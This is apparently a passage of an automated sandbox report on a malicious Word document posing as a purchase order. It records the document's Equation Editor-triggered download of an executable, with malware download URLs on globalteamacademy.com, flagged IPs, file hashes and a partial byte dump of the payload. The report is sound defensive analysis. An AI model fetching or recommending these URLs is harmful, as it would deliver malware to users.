                          http://www.certifikat.dk/repository0pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.chambersign.org1pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.diginotar.nl/cps/pkioverheid0pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.pkioverheid.nl/policies/root-policy0pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://mail.privateemail.compridingnsjhfhdjs.exe, 00000007.00000002.2395251987.0000000002530000.00000004.00000001.sdmpfalse
                            high
                            http://crl.ssc.lt/root-c/cacrl.crl0pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.post.trust.ie/reposit/cps.html0pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.pridingnsjhfhdjs.exe, 00000004.00000002.2144136289.00000000054C0000.00000002.00000001.sdmp, pridingnsjhfhdjs.exe, 00000007.00000002.2397057419.0000000005CC0000.00000002.00000001.sdmpfalse
                              high
                              http://crl.xrampsecurity.com/XGCA.crl0pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://crl.securetrusmpridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.quovadis.bm0pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.%s.comPApridingnsjhfhdjs.exe, 00000004.00000002.2144136289.00000000054C0000.00000002.00000001.sdmp, pridingnsjhfhdjs.exe, 00000007.00000002.2397057419.0000000005CC0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              low
                              http://www.certicamara.com0pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://crl.ssc.lt/root-a/cacrl.crl0pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.firmaprofesional.com0pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://crl.chambpridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://ocsp.quovadisoffshore.com0pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://ocsp.entrust.net0Dpridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.wellsfargo.com/certpolicy0pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmpfalse
                                high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepridingnsjhfhdjs.exe, 00000004.00000002.2139955625.0000000002471000.00000004.00000001.sdmpfalse
                                  high
                                  https://secure.comodo.com/CPS0pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpfalse
                                    high
                                    http://Gspsks.compridingnsjhfhdjs.exe, 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zippridingnsjhfhdjs.exefalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://servername/isapibackend.dllpridingnsjhfhdjs.exe, 00000007.00000002.2401524278.00000000081A0000.00000002.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    low
                                    http://cps.chambersign.org/cps/chamberpridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://crl.entrust.net/2048ca.crl0pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.ssc.lt/cps03pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPDomainCountryFlagASNASN NameMalicious
                                      43.252.37.193
                                      unknownMalaysia
                                      45144NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloudtrue
                                      198.54.122.60
                                      unknownUnited States
                                      22612NAMECHEAP-NETUSfalse

                                      General Information

                                      Joe Sandbox Version:31.0.0 Emerald
                                      Analysis ID:349841
                                      Start date:08.02.2021
                                      Start time:10:27:24
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 9m 2s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:Revised Purchase Order 1214.doc
                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                      Number of analysed new started processes analysed:8
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.expl.evad.winDOC@8/15@9/2
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 1.7% (good quality ratio 1%)
                                      • Quality average: 41.6%
                                      • Quality standard deviation: 34.8%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 69
                                      • Number of non-executed functions: 7
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .doc
                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                      • Attach to Office via COM
                                      • Scroll down
                                      • Close Viewer
                                      Warnings:
                                      Show All
                                      • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 2.20.142.209, 2.20.142.210
                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtCreateFile calls found.
                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                      • Report size getting too big, too many NtEnumerateValueKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      10:27:40API Interceptor351x Sleep call for process: EQNEDT32.EXE modified
                                      10:28:01API Interceptor1314x Sleep call for process: pridingnsjhfhdjs.exe modified
                                      10:28:04API Interceptor1x Sleep call for process: schtasks.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      43.252.37.193INQUIRY_RFQ_20210208.docGet hashmaliciousBrowse
                                      • globalteamacademy.com/showcase/bill/6vWjC1g7qA0Z76f.exe
                                      Request- NAVALTECH.docGet hashmaliciousBrowse
                                      • globalteamacademy.com/docct/zic/KlalU0GjxacVNEE.exe
                                      Quotation-20441.docGet hashmaliciousBrowse
                                      • globalteamacademy.com/docct/pal/g1OsYVWymzBgTTt.exe
                                      PROFORMA INVOICE-09765434.docGet hashmaliciousBrowse
                                      • globalteamacademy.com/docct/uzz/E6RVLMWo0fz1jFA.exe
                                      New ORDER 092134..docGet hashmaliciousBrowse
                                      • globalteamacademy.com/docct/dj/fBqZ0SFcHFfoBIY.exe
                                      RFQ A50924-E001.docGet hashmaliciousBrowse
                                      • globalteamacademy.com/epl/zi/SAM.exe
                                      quotation085312456.docGet hashmaliciousBrowse
                                      • globalteamacademy.com/epl/pll/PALLS.exe
                                      STEELWORKS RFQ-38166.docGet hashmaliciousBrowse
                                      • globalteamacademy.com/epl/ja/JASP.exe
                                      198.54.122.60INQUIRY_RFQ_20210208.docGet hashmaliciousBrowse
                                        DHL_document11022020680908911.doc.exeGet hashmaliciousBrowse
                                          veHKklzK74heP6u.exeGet hashmaliciousBrowse
                                            Inquiry_0197832.exeGet hashmaliciousBrowse
                                              SecuriteInfo.com.Trojan.GenericKDZ.72843.798.exeGet hashmaliciousBrowse
                                                SecuriteInfo.com.Trojan.GenericKDZ.72843.10964.exeGet hashmaliciousBrowse
                                                  SecuriteInfo.com.Trojan.GenericKDZ.72843.164.exeGet hashmaliciousBrowse
                                                    SecuriteInfo.com.Trojan.GenericKDZ.72843.30875.exeGet hashmaliciousBrowse
                                                      SecuriteInfo.com.Trojan.GenericKDZ.72843.26409.exeGet hashmaliciousBrowse
                                                        SecuriteInfo.com.Trojan.GenericKDZ.72843.1327.exeGet hashmaliciousBrowse
                                                          SecuriteInfo.com.Trojan.PWS.Stealer.21240.29506.exeGet hashmaliciousBrowse
                                                            SecuriteInfo.com.Trojan.GenericKDZ.72843.8979.exeGet hashmaliciousBrowse
                                                              SecuriteInfo.com.Trojan.GenericKDZ.72843.9200.exeGet hashmaliciousBrowse
                                                                U2LameOT02.exeGet hashmaliciousBrowse
                                                                  Request- NAVALTECH.docGet hashmaliciousBrowse
                                                                    Quotation-20441.docGet hashmaliciousBrowse
                                                                      PROFORMA INVOICE-09765434.docGet hashmaliciousBrowse
                                                                        New ORDER 092134..docGet hashmaliciousBrowse
                                                                          i0K5YoZXLi.exeGet hashmaliciousBrowse
                                                                            STEELWORKS RFQ-38166.docGet hashmaliciousBrowse

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              globalteamacademy.comINQUIRY_RFQ_20210208.docGet hashmaliciousBrowse
                                                                              • 43.252.37.193
                                                                              Request- NAVALTECH.docGet hashmaliciousBrowse
                                                                              • 43.252.37.193
                                                                              Quotation-20441.docGet hashmaliciousBrowse
                                                                              • 43.252.37.193
                                                                              PROFORMA INVOICE-09765434.docGet hashmaliciousBrowse
                                                                              • 43.252.37.193
                                                                              New ORDER 092134..docGet hashmaliciousBrowse
                                                                              • 43.252.37.193
                                                                              RFQ A50924-E001.docGet hashmaliciousBrowse
                                                                              • 43.252.37.193
                                                                              quotation085312456.docGet hashmaliciousBrowse
                                                                              • 43.252.37.193
                                                                              STEELWORKS RFQ-38166.docGet hashmaliciousBrowse
                                                                              • 43.252.37.193
                                                                              mail.privateemail.comINQUIRY_RFQ_20210208.docGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              DHL_document11022020680908911.doc.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              veHKklzK74heP6u.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              Inquiry_0197832.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              SecuriteInfo.com.Trojan.GenericKDZ.72843.798.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              SecuriteInfo.com.Trojan.GenericKDZ.72843.10964.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              SecuriteInfo.com.Trojan.GenericKDZ.72843.164.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              SecuriteInfo.com.Trojan.GenericKDZ.72843.30875.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              SecuriteInfo.com.Trojan.GenericKDZ.72843.26409.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              SecuriteInfo.com.Trojan.GenericKDZ.72843.1327.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              SecuriteInfo.com.Trojan.PWS.Stealer.21240.29506.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              SecuriteInfo.com.Trojan.GenericKDZ.72843.8979.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              SecuriteInfo.com.Trojan.GenericKDZ.72843.9200.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              U2LameOT02.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              Request- NAVALTECH.docGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              Quotation-20441.docGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              PROFORMA INVOICE-09765434.docGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              New ORDER 092134..docGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              i0K5YoZXLi.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              STEELWORKS RFQ-38166.docGet hashmaliciousBrowse
                                                                              • 198.54.122.60

                                                                              ASN

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              NAMECHEAP-NETUSINQUIRY_RFQ_20210208.docGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              INV411422.xlsGet hashmaliciousBrowse
                                                                              • 198.54.120.71
                                                                              DHL_document11022020680908911.doc.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              #U260e#Ufe0fmsg0091January_report_2021.HTMGet hashmaliciousBrowse
                                                                              • 198.54.115.249
                                                                              N4GjPirQhmtozOW.exeGet hashmaliciousBrowse
                                                                              • 199.193.7.228
                                                                              veHKklzK74heP6u.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              Inquiry_0197832.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              SecuriteInfo.com.Trojan.GenericKDZ.72843.798.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              SecuriteInfo.com.Trojan.GenericKDZ.72843.10964.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              SecuriteInfo.com.Trojan.GenericKDZ.72843.164.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              SecuriteInfo.com.Trojan.GenericKDZ.72843.30875.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              SecuriteInfo.com.Trojan.GenericKDZ.72843.26409.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              SecuriteInfo.com.Trojan.GenericKDZ.72843.1327.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              SecuriteInfo.com.Trojan.PWS.Stealer.21240.29506.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              SecuriteInfo.com.Trojan.GenericKDZ.72843.8979.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              SecuriteInfo.com.Trojan.GenericKDZ.72843.9200.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              ztx85QLpZB.exeGet hashmaliciousBrowse
                                                                              • 199.188.200.97
                                                                              U2LameOT02.exeGet hashmaliciousBrowse
                                                                              • 198.54.122.60
                                                                              #U260e#Ufe0fmsg0100February_report_2021.HTMGet hashmaliciousBrowse
                                                                              • 198.54.115.249
                                                                              GIuEtCOYbL.exeGet hashmaliciousBrowse
                                                                              • 199.193.7.228
                                                                              NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloudINQUIRY_RFQ_20210208.docGet hashmaliciousBrowse
                                                                              • 43.252.37.193
                                                                              Request- NAVALTECH.docGet hashmaliciousBrowse
                                                                              • 43.252.37.193
                                                                              Quotation-20441.docGet hashmaliciousBrowse
                                                                              • 43.252.37.193
                                                                              PROFORMA INVOICE-09765434.docGet hashmaliciousBrowse
                                                                              • 43.252.37.193
                                                                              New ORDER 092134..docGet hashmaliciousBrowse
                                                                              • 43.252.37.193
                                                                              RFQ A50924-E001.docGet hashmaliciousBrowse
                                                                              • 43.252.37.193
                                                                              quotation085312456.docGet hashmaliciousBrowse
                                                                              • 43.252.37.193
                                                                              STEELWORKS RFQ-38166.docGet hashmaliciousBrowse
                                                                              • 43.252.37.193
                                                                              PAYMENT 25SW Aug-06-2018.docGet hashmaliciousBrowse
                                                                              • 182.239.42.250

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                              Process:C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
                                                                              File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                              Category:dropped
                                                                              Size (bytes):59134
                                                                              Entropy (8bit):7.995450161616763
                                                                              Encrypted:true
                                                                              SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                              MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                              SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                              SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                              SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                              Process:C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):328
                                                                              Entropy (8bit):3.0847546854849544
                                                                              Encrypted:false
                                                                              SSDEEP:6:kKRbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:Q3kPlE99SNxAhUeo+aKt
                                                                              MD5:E050C94DDB1E5D525D7535EC2953BE53
                                                                              SHA1:722F82220D9281CF913EBC9544E3F66243CB344F
                                                                              SHA-256:66AEA140B30A6DB246E9A7AD3142635D55BE675F04158C7335606DD10C07E374
                                                                              SHA-512:CA24B0A2F9915952C8E0EEF552024FC2A22366B4BCB6614788CF6D4FC2D7BC320FE1E35031A06F02AADD0CE1AA4764F722EA7C12F396CB41B67EA8B14E879A10
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview: p...... .........B<!W...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\TrC86HH4pxVZ49N[1].exe
                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:downloaded
                                                                              Size (bytes):734720
                                                                              Entropy (8bit):7.6904916579877
                                                                              Encrypted:false
                                                                              SSDEEP:12288:/ytZi970Oz6hGyBh7WVQlW9QWwJnKSr9Iz5JpqbvsKcDDgqnpLTm:/gZ7BhaVQlW9QWwpnr9IzHsTWgcpLTm
                                                                              MD5:CEDD3570A65CE74199167DA6E5190CC4
                                                                              SHA1:A3BB3123551BEF96ADCDC4487E1D2B32752D65F7
                                                                              SHA-256:5158FFB1CEECEC8B07B14DC463CC8356283A006443A0D6201D91222AC52BAE03
                                                                              SHA-512:9C1C4C290AD5611B480119EFB81244F889370AC4F36380EBDA64058FB19F2424CDE1B9DB1F3339BDE330B8897CE1179D7EE1415DAC129D6A52671E9D65636824
                                                                              Malicious:true
                                                                              Reputation:low
                                                                              IE Cache URL:http://globalteamacademy.com/showcase/pal/TrC86HH4pxVZ49N.exe
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... `................. ..........>>... ........@.. ....................................@..................................=..W....@.......................`....................................................... ............... ..H............text...D.... ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......4..............@..B................ >......H........$..\...........(...`C...........................................0............(....(..........(.....o.....*.....................(.......(.......(.......(.......(.....*.N..(....o....(.....*&..(.....*...s.........s.........s.........s.........s.........*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0.................,.........o....+....9....~.........,2~.........(....o .....,.
                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8ADBC433-349E-46EF-BF24-C3A751787722}.tmp
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1024
                                                                              Entropy (8bit):0.05390218305374581
                                                                              Encrypted:false
                                                                              SSDEEP:3:ol3lYdn:4Wn
                                                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AB5F6AD7-3C7C-4823-93B4-8E22DB7DEE25}.tmp
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1024
                                                                              Entropy (8bit):0.8790639092877375
                                                                              Encrypted:false
                                                                              SSDEEP:3:tlDXT91lZlwlj2lfgREqAWlglqlg7tlhlhlWlllljlll8v0lglwZsl8gl7vlI9:TD9RqwNgREqAWlgFJA//jlll8vlw2FrA
                                                                              MD5:E7171C90A42F5A8BBDA6F50048C9BF36
                                                                              SHA1:58E96A64997B44999321B05C925C92AB39C31006
                                                                              SHA-256:C4E72B371913D2BC9B28262545E51C469FB0C46C046D99F3C69191CD1F488094
                                                                              SHA-512:F0C54B1853CF35585AC3C6D3928671CBB183B0928CF8752583014BFD6360E4F79B2E8755D09A271BB6687AFA91D45685A13F342F7EF141FC10C8423B2690B7E2
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview: . . . . . . . . . . . . . . . . . . . . . . . . . .2.5.6.8.5.2._.3.8.0.0.2.2.2.3.8.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D.........................................................................................................................................................................................................................................................................................................................................................................................................V...\.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ
                                                                              C:\Users\user\AppData\Local\Temp\Cab11CF.tmp
                                                                              Process:C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
                                                                              File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                              Category:dropped
                                                                              Size (bytes):59134
                                                                              Entropy (8bit):7.995450161616763
                                                                              Encrypted:true
                                                                              SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                              MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                              SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                              SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                              SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                              C:\Users\user\AppData\Local\Temp\Tar11D0.tmp
                                                                              Process:C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
                                                                              File Type:data
                                                                              Category:modified
                                                                              Size (bytes):152788
                                                                              Entropy (8bit):6.316654432555028
                                                                              Encrypted:false
                                                                              SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                                              MD5:64FEDADE4387A8B92C120B21EC61E394
                                                                              SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
